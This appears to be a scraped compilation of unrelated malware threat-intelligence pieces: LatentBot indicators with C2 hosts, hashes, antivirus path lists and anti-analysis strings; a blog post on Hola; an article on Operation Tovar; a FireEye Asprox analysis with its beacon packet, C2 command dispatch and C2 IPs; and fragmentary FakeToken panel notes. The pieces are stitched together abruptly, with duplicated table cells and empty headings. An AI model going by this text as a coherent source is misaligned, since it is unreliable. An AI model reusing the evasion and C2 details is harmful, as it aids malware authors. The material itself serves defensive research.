The binary is a copy of aya.exe

HKCU\Software\Adobe\Adobe Acrobat\data = <random_value>
HKCU\Software\Google\Update\network\secure

With 0 to 5 subkeys representing modules names:
HKCU\Software\Google\Update\network\secure\hdtWD3zyxMpSQB
HKCU\Software\Google\Update\network\secure\QdW/DoI2F9J
HKCU\Software\Google\Update\network\secure\RRrIibQs+WzRVv5B+9iIys+17huxID
HKCU\Software\Google\Update\network\secure\VRWVBM6UtH6F+7UcwkBKPB
HKCU\Software\Google\Update\network\secure\zRlBb9ofmNVErtdu
HKCU\Software\Google\Update\network\update
HKCU\Software\Google\Common\Rlz\Events\Update
HKCU\Software\Google\Common\Rlz\Events\EventsID


NBI:

CnC IPs (Some of them are compromised legitimate websites):

46.165.246.234
209.208.79.114
REMOTESUPPORT.AARIVERSIDE.COM
83.175.125.150
83.175.125.152
OFFICE.ONTIMEDATASOLUTIONS.COM
ESTREAM.HOMELINUX.COM
95.211.230.212
46.165.246.234
37.220.9.229
SBA-VIG.VIG.PL
SBA2-VIG.VIG.PL
ITMANAGER.MASPEX.COM
GATE.SPACESOFT.KR
CMC.COUNTERP.COM
121.78.119.97
136.243.16.249
180.71.39.228
220.76.17.25
195.254.174.74
83.13.163.218
83.238.72.234
155.133.120.21
DATAROAD.IPTIME.ORG
121.67.110.204

LATENTBOT Samples

1dd0854a73288e833966fde139ffe385 aya.exe
af15076a22576f270af0111b93fe6e03 lssm.exe
47f220f6110ecba74a69928c20ce9d3e
5446022c6d14a45fd6ef412a2d6601c5
a11362a8e32b5641e90920729d61b3d4
d349806ea1f2af0f447b2c9e20cb88f0
6ea9d27d23646fc94e05b8c5e921db99
56ba76cf35a1121bf83920003c2af825
2d2484d578bfcd983acb151c89e5a120
08bb5f82dec4957ad9da12239f606a00
4135552b0045e7d67b26167f43b88a30
af15076a22576f270af0111b93fe6e03
4d0b14024d4a7ffcff25f2a3ce337af8


BOT_ENGINE Plugin 1: The list of default installation paths of popular AV

Documents and Settings\All Users\Application Data\Agnitum
Documents and Settings\All Users\Application Data\avg10
Documents and Settings\All Users\Application Data\avg8
Documents and Settings\All Users\Application Data\avg9
Documents and Settings\All Users\Application Data\Avira
Documents and Settings\All Users\Application Data\Doctor Web
Documents and Settings\All Users\Application Data\ESET
Documents and Settings\All Users\Application Data\f-secure
Documents and Settings\All Users\Application Data\G DATA
Documents and Settings\All Users\Application Data\Kaspersky Lab\
Documents and Settings\All Users\Application Data\McAfee
Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware
Documents and Settings\All Users\Application Data\PC Tools
Documents and Settings\All Users\Application Data\Symantec
Documents and Settings\All Users\Application Data\Trend Micro
Documents and Settings\All Users\AVAST Software
Documents and Settings\NetworkService\Local Settings\Application Data\F-Secure
Program Files\Agnitum
Program Files\Alwil Software
Program Files\AVAST Software
Program Files\AVG
Program Files\Avira
Program Files\BitDefender9
Program Files\Common Files\Doctor Web
Program Files\Common Files\G DATA
Program Files\Common Files\PC Tools
Program Files\DrWeb
Program Files\ESET
Program Files\F-Secure Internet Security
Program Files\FRISK Software
Program Files\Kaspersky Lab
Program Files\McAfee
Program Files\Microsoft Security Essentials
Program Files\Norton AntiVirus
Program Files\Panda Security
Program Files\PC Tools Internet Security

Program Files\Symantec
Program Files\Trend Micro
Program Files\Vba32


VNC Plugin:

Searching for malware analyst tools

 OLLYDBG
 DBG
 W32DSM
 drivers\sice.sys
 drivers\ntice.sys
 drivers\syser.sys
 drivers\winice.sys
 drivers\sice.vxd
 drivers\winice.vxd
 winice.vxd
 vmm32\winice.vxd
 sice.vxd
 hgfs.sys
 vmhgfs.sys
 prleth.sys
 prlfs.sys
 prlmouse.sys
 prlvideo.sys
 prl_pv32.sys
 vpc-s3.sys
 vmsrvc.sys
 vmx86.sys
 vmnet.sys
 \\.\SICE
 \\.\SIWVID
 \\.\NTICE
 \\.\TRW
 \\.\TWX
 \\.\ICEEXT
 \\.\Syser
 \\.\SyserDbgMsg
 \\.\SyserBoot
 SbieDll.dll
 api_log.dll
 dir_watch.dll
 dbghelp.dll
 pstorec.dll
 Sandbox
 honeyq
 vmware
 nepenthes
 snort
 andyd
 c:\analysis
 joeboxcontrol.exe
 wireshark.exe
 regmon.exe
 filemon.exe
 procmon.exe
 SandboxieRpc
 SandboxieDcomLaunch.exe
 VBoxService.exe
 VMwareTray.exe
 VMwareService.exe
 VMwareUser.exe
 xenservice.exe
 sniff_hit.exe
 sysAnalyzer.exe
 procexp.exe
 autoruns.exe
 prl_cc.exe
 LoadOrd.exe
 Diskmon.exe
 RootkitRevealer.exe
 portmon.exe
 Tcpview.exe
 Dbgview.exe
 procdump.exe
 cfp.exe


PONY STEALER Plugin: List of Bitcoin Wallets and Currencies 1

Bitcoin Currencies:

Bitcoin
Litecoin
Namecoin
Terracoin
PPcoin
Primecoin
Feathercoin
Novacoin
Freicoin
Devoin
Franko
Megacoin
Quarkcoin
Worldcoin
Infinitecoin
Ixcoin
Anoncoin
BBQcoin
Digitalcoin
Mincoin
Goldcoin
Yacoin
Zetacoin
Fastcoin
I0coin
Tagcoin
Bytecoin
Florincoin
Phoenixcoin
Luckycoin
Craftcoin
Junkcoin

Wallets:

Armory wallet
Electrum wallet
Multibit wallet

It’s no Fun Being Right All the Time

Last week, I finally got around to writing about HideMyAss, and doing a spot of speculation about how other proxy anonymizers earn their coin. Almost immediately I hit "publish" I spotted this article pop up on Zdnet. Apparently/allegedly, Hola subsidise their income by turning your machine into a part-time member of a botnet.
Normally, I really enjoy being proved right - ask my long suffering colleagues. In this case though, I'd rather the news wasn't quite so worrying. A bit of advertising, click hijacking and so forth is liveable. Malware? You can get rid... but a botnet client means you might be part of something illegal, and you'd never know the difference.

Operation Tovar: The Latest Attempt to Eliminate Key Botnets

Coordinated botnet disruptions have increased in pace and popularity over the last few years as more private companies work with international law enforcement agencies to combat malware infections on a grand scale. Operation Tovar, announced on June 2 2014, is the latest to make headlines. The target of the investigation, Evgeniy Mikhailovich Bogachev, was indicted by the Department of Justice and is wanted by the FBI for his role as alleged leader of the Gameover ZeuS and CryptoLocker botnets. Four other defendants were indicted using their pseudonyms. Though Bogachev’s current activities aren’t known, the Operation Tovar task force has maintained control of the botnet infrastructure and remediation efforts are ongoing.

While new malware strains are released with increasing frequency, it’s easy to forget why Gameover and CryptoLocker are worthwhile targets for takedown operations. Both offered more advanced features than their peers and typified the increasingly sophisticated cybercriminal enterprises behind botnets.

Gameover ZeuS

Since the ZeuS source code was released in 2011, several new variants have appeared in the wild. Citadel, KINS, ICE IX, and Gameover have all improved upon the basic ZeuS model by introducing new features, using better encryption, and modifying command and control (C2) communication methods.

Gameover uses a peer-to-peer (P2P) system for C2 communication. Though other P2P botnets such as Kelihos exist, Gameover is notable for its use of proxy nodes to introduce complexity into the standard P2P infrastructure. These proxy nodes are specific machines designated as relay points through which the botnet operators send commands and receive stolen information. This minimizes the number of systems that actually communicate with C2 servers. C2 commands are signed using RSA-2048 and encrypted with RC4 making it very difficult to tamper with the botnet.

Additionally, Gameover maintains a failsafe mechanism: a domain generation algorithm (DGA) that produces 1,000 domains each week. This feature enables the operators to maintain control of their botnet even if the P2P infrastructure is compromised. The DGA produces long, nonsensical strings at one of six top-level domains: .com, .net, .org, .biz, .info, and .ru that can be registered and used to send commands to the botnet.

ZeuS and all its variants are information-stealing trojans. We refer to them as banking trojans because that’s where they excel and Gameover is no exception. Gameover is able to trick the user into handing over personal information and can even defeat two-factor authentication. It accomplishes this by injecting custom code into the browser when a victim visits certain websites. Gameover’s arsenal of bank account takeover tools includes 1,500 web injections that were custom-made to target the websites of more than 700 financial institutions worldwide.

In addition to its exceptional abilities as a banking trojan, Gameover is capable of a wider variety of data theft activities. An Operation Tovar task force member, speaking to Brian Krebs on the condition of anonymity, said they have evidence of additional harvested data and that Gameover targeted proprietary information.

CryptoLocker

Not content with merely engaging in widespread banking credential and information theft, the Gameover criminal operators decided to maximize returns by infecting systems with CryptoLocker. It is a type of ransomware that encrypts the files on infected machines and then demands a ransom of hundreds of dollars in order to receive a decryption key. Typically, victims were given 72 hours to pay the ransom in bitcoins or risk losing their data.

Unwilling to miss out on any opportunity to generate revenue, the criminal operators set up a website to assist victims in paying the ransom in bitcoins. Through this website, victims could complete the transaction and track the status of their “order” – the ransom payment in exchange for the decryption key. Some victims, unwilling or unable to pay the ransom, missed the 72-hour deadline only to see the ransom demand increase fivefold.

Law enforcement officials discouraged people from paying the ransom since it would fund a criminal organization, but without back ups many victims had little choice but to pay. A US police department paid $750 for two Bitcoins as ransom after CryptoLocker was installed on a system used for police reports and booking photos. CryptoLocker encrypts files using asymmetric encryption, making use of a public and a private key. Without the private key, located on the criminals’ servers, infected files probably cannot be decrypted.

The Target

Operation Tovar’s investigation began with a server in the UK. A trail of wire transfers, money mules, criminal servers, and at least one confidential source led investigators to Bogachev. He is a Russian citizen wanted on charges of conspiracy to participate in racketeering activity, bank fraud, conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to violate the Identity Theft and Assumption Deterrence Act, aggravated identity theft, conspiracy, computer fraud, wire fraud, and money laundering. The FBI estimates the financial toll of Gameover at over $100 million and another estimate is that more than $27 million in ransom payments were made in the first two months of CryptoLocker’s distribution.

Obtaining an indictment against a Russian national who will likely never be extradited to the United States isn’t sufficient to put an end to a criminal organization. In 2011, Russian citizen Aleksandr Andreevich Panin was indicted in the US on 23 counts related to the development and distribution of SpyEye but was not arrested until 2013 when he flew through Hartsfield-Jackson Atlanta International Airport. The Russian government, in a travel warning to its citizens, specifically mentions Panin and recommends that Russians facing legal action in the US should refrain from travelling internationally.

The Takeover

Drawing on the technical expertise of its members, the Operation Tovar task force was able to exploit flaws in the design of Gameover’s P2P network to manipulate the peer list and redirect traffic to nodes under its control. The specific technical details have not been released to the public in order to prevent the criminals from regaining control.

Gameover’s failsafe mechanism, the DGA that was supposed to have allowed the criminals to maintain control in the event of a P2P disruption, was reverse engineered by task force members. The FBI then obtained a restraining order to redirect any attempts to register those domains to a government-run server. Furthermore, US service providers are required to block connections to the Russian .ru domains generated by the DGA since the US has no jurisdiction to prevent their registration.

CryptoLocker also used a DGA for determining C2 locations. The algorithm was reverse engineered and the C2 servers were identified and seized by the Operation Tovar task force. Due to the use of an asymmetric key algorithm, CryptoLocker victims whose files remain encrypted currently have no avenue of remediation.

Operation Tovar’s success can be measured by two factors: (1) Have the criminals regained control of their botnets and (2) Is the malware being removed from infected machines? While we can’t say for certain that the people responsible for Gameover and CryptoLocker have ceased all criminal activity, they have not regained control of the network disrupted by Operation Tovar. Based on this fact alone, the task force should be commended. Successful botnet disruptions are very challenging. Attempted takeovers over Kelihos have been undone after only two weeks.

The remediation of infected machines is an even more difficult task. US-CERT has published a list of recommended actions and resources, and a number of the private companies involved in Operation Tovar have released scanning tools. The onus remains on individuals and organizations to use these resources to determine if they are infected and take the appropriate steps to remediate the problem. Statistics published by The Shadowserver Foundation show the number of machines infected with Gameover has remained essentially flat since the takeover. There are simply not enough people taking advantage of the resources available to remediate their systems.

tovar1

The task force has taken control of the C2 network and now some people may believe that the malware is neutered and no further action is required. It is important to remember that any malware is unauthorized code running on a computer. The integrity of the system is still compromised, regardless of who is in control of the botnet.

A Not-So Civic Duty: Asprox Botnet Campaign Spreads Court Dates and Malware

Executive Summary

FireEye Labs has been tracking a recent spike in malicious email detections that we attribute to a campaign that began in 2013. While malicious email campaigns are nothing new, this one is significant in that we are observing mass-targeting attackers adopting the malware evasion methods pioneered by the stealthier APT attackers. And this is certainly a high-volume business, with anywhere from a few hundred to ten thousand malicious emails sent daily – usually distributing between 50 and 500,000 emails per outbreak.

Through the FireEye Dynamic Threat Intelligence (DTI) cloud, FireEye Labs discovered that each and every major spike in email blasts brought a change in the attributes of their attack. These changes have made it difficult for anti-virus, IPS, firewalls and file-based sandboxes to keep up with the malware and effectively protect endpoints from infection. Worse, if past is prologue, we can expect other malicious, mass-targeting email operators to adopt this approach to bypass traditional defenses.

This blog will cover the trends of the campaign, as well as provide a short technical analysis of the payload.

Campaign Details

fig1

Figure 1: Attack Architecture

The campaign first appeared in late December of 2013 and has since been seen in fairly cyclical patterns each month. It appears that the threat actors behind this campaign are fairly responsive to published blogs and reports surrounding their malware techniques, tweaking their malware accordingly to continuously try and evade detection with success.

In late 2013, malware labeled as Kuluoz, the specific spam component of the Asprox botnet, was discovered to be the main payload of what would become the first malicious email campaign. Since then, the threat actors have continuously tweaked the malware by changing its hardcoded strings, remote access commands, and encryption keys.

Previously, Asprox malicious email campaigns targeted various industries in multiple countries and included a URL link in the body. The current version of Asprox includes a simple zipped email attachment that contains the malicious payload “exe.” Figure 2 below represents a sample message while Figure 3 is an example of the various court-related email headers used in the campaign.

fig2

Figure 2 Email Sample

fig3

Figure 3 Email Headers

Some of the recurring campaign that Asporox used includes themes focused around airline tickets, postal services and license keys. In recent months however, the court notice and court request-themed emails appear to be the most successful phishing scheme theme for the campaign.

The following list contains examples of email subject variations, specifically for the court notice theme:

  • Urgent court notice
  • Notice to Appear in Court
  • Notice of appearance in court
  • Warrant to appear
  • Pretrial notice
  • Court hearing notice
  • Hearing of your case
  • Mandatory court appearance

The campaign appeared to increase in volume during the month of May. Figure 4 shows the increase in activity of Asprox compared to other crimewares towards the end of May specifically. Figure 5 highlights the regular monthly pattern of overall malicious emails. In comparison, Figure 6 is a compilation of all the hits from our analytics.

fig4

Figure 4 Worldwide Crimeware Activity

fig5

Figure 5 Overall Asprox Botnet tracking

fig6

Figure 6 Asprox Botnet Activity Unique Samples

These malicious email campaign spikes revealed that FireEye appliances, with the support of DTI cloud, were able to provide a full picture of the campaign (blue), while only a fraction of the emailed malware samples could be detected by various Anti-Virus vendors (yellow).

fig7

Figure 7 FireEye Detection vs. Anti-Virus Detection

By the end of May, we observed a big spike on the unique binaries associated with this malicious activity. Compared to the previous days where malware authors used just 10-40 unique MD5s or less per day, we saw about 6400 unique MD5s sent out on May 29th. That is a 16,000% increase in unique MD5s over the usual malicious email campaign we’d observed. Compared to other recent email campaigns, Asprox uses a volume of unique samples for its campaign.

fig8

Figure 8 Asprox Campaign Unique Sample Tracking

fig9

Figure 9 Geographical Distribution of the Campaign

fig10

Figure 10 Distribution of Industries Affected

Brief Technical Analysis

fig11

Figure 11 Attack Architecture

Infiltration

The infiltration phase consists of the victim receiving a phishing email with a zipped attachment containing the malware payload disguised as an Office document. Figure 11 is an example of one of the more recent phishing attempts.

fig12

Figure 12 Malware Payload Icon

Evasion

Once the victim executes the malicious payload, it begins to start an svchost.exe process and then injects its code into the newly created process. Once loaded into memory, the injected code is then unpacked as a DLL. Notice that Asprox uses a hardcoded mutex that can be found in its strings.

  1. Typical Mutex Generation
    1. "2GVWNQJz1"
  2. Create svchost.exe process
  3. Code injection into svchost.exe

Entrenchment

Once the dll is running in memory it then creates a copy of itself in the following location:

%LOCALAPPDATA%/[8 CHARACTERS].EXE

Example filename:

%LOCALAPPDATA%\lwftkkea.exe

It’s important to note that the process will first check itself in the startup registry key, so a compromised endpoint will have the following registry populated with the executable:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

Exfiltration/Communication

The malware uses various encryption techniques to communicate with the command and control (C2) nodes. The communication uses an RSA (i.e. PROV_RSA_FULL) encrypted SSL session using the Microsoft Base Cryptographic Provider while the payloads themselves are RC4 encrypted. Each sample uses a default hardcoded public key shown below.

Default Public Key

-----BEGIN PUBLIC KEY-----

MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCUAUdLJ1rmxx+bAndp+Cz6+5I'

Kmgap2hn2df/UiVglAvvg2US9qbk65ixqw3dGN/9O9B30q5RD+xtZ6gl4ChBquqw

jwxzGTVqJeexn5RHjtFR9lmJMYIwzoc/kMG8e6C/GaS2FCgY8oBpcESVyT2woV7U

00SNFZ88nyVv33z9+wIDAQAB

-----END PUBLIC KEY-----

First Communication Packet

Bot ID RC4 Encrypted URL

POST /5DBA62A2529A51B506D197253469FA745E7634B4FC

HTTP/1.1

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: <host useragent>

Host: <host ip>:443

Content-Length: 319

Cache-Control: no-cache

<knock><id>5DBA62A247BC1F72B98B545736DEA65A</id><group>0206s</group><src>3</src><transport>0</transport><time>1881051166</time><version>1537</version><status>0</status><debug>none<debug></knock>

C2 Commands

In comparison to the campaign at the end of 2013, the current campaign uses one of the newer versions of the Asprox family where threat actors added the command “ear.”

if ( wcsicmp(Str1, L"idl") )

{

if ( wcsicmp(Str1, L"run") )

{

if ( wcsicmp(Str1, L"rem") )

{

if ( wcsicmp(Str1, L"ear")

{

if ( wcsicmp(Str1, L"rdl") )

{

if ( wcsicmp(Str1, L"red") )

{

if ( !wcsicmp(Str1, L"upd") )

C2 commands Description
idl idl This commands idles the process to wait for commands This commands idles the process to wait for commands
run run Download from a partner site and execute from a specified path Download from a partner site and execute from a specified path
rem rem Remove itself Remove itself
ear ear Download another executable and create autorun entry Download another executable and create autorun entry
rdl rdl Download, inject into svchost, and run Download, inject into svchost, and run
upd upd Download and update Download and update
red red Modify the registry Modify the registry

C2 Campaign Characteristics

fig13

For the two major malicious email campaign spikes in April and May of 2014, separate sets of C2 nodes were used for each major spike.

April May-June
94.23.24.58 94.23.24.58 192.69.192.178 192.69.192.178
94.23.43.184 94.23.43.184 213.21.158.141 213.21.158.141
1.234.53.27 1.234.53.27 213.251.150.3 213.251.150.3
84.124.94.52 84.124.94.52 27.54.87.235 27.54.87.235
133.242.134.76 133.242.134.76 61.19.32.24 61.19.32.24
173.45.78.226 173.45.78.226 69.64.56.232 69.64.56.232
37.59.9.98 37.59.9.98 72.167.15.89 72.167.15.89
188.93.74.192 188.93.74.192 84.234.71.214 84.234.71.214
187.16.250.214 187.16.250.214 89.22.96.113 89.22.96.113
85.214.220.78 85.214.220.78 89.232.63.147 89.232.63.147
91.121.20.71 91.121.20.71
91.212.253.253 91.212.253.253
91.228.77.15 91.228.77.15

Conclusion

The data reveals that each of the Asprox botnet’s malicious email campaigns changes its method of luring victims and C2 domains, as well as the technical details on monthly intervals. And, with each new improvement, it becomes more difficult for traditional security methods to detect certain types of malware.

Acknowledgements:

Nart Villeneuve, Jessa dela Torre, and David Sancho. Asprox Reborn. Trend Micro. 2013. http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-asprox-reborn.pdf

Android/FakeToken.A

OTP forwarder dumped months ago.

Login:

Statistics:

Bots:

Bot:

Passwords:

Send a command:

Commands sent:

Apps:

Apps builder:

MD5s:
2d4770137ae0b91446fc2f99d9fdb2b0
f629adcfbcdd4622ad75337ec0b1a0ff
dd4ac55df6500352dd2cad340a36a40f
b9f9614775a54aa42f94eedbc4796446
1fababfd02ea09ae924cd0a7dbfb708c
bc8394bc9c6adbcfca3d450ee4ede44a
1cb87e1716c503bf499e529ee90e5b31
6db5cdd2648fcd445481cdfa2f2b065a
2ad6f8b8e4aaf88b024e1ddb99833b79
8bac185b6aff0bec4686b7f4cb1659c8

App settings:

Settings:

Second panel, a bit different, look like a 'test' one.
Statistics:

Phone:

Phone search:

Settings:

RSA Security talked also about it here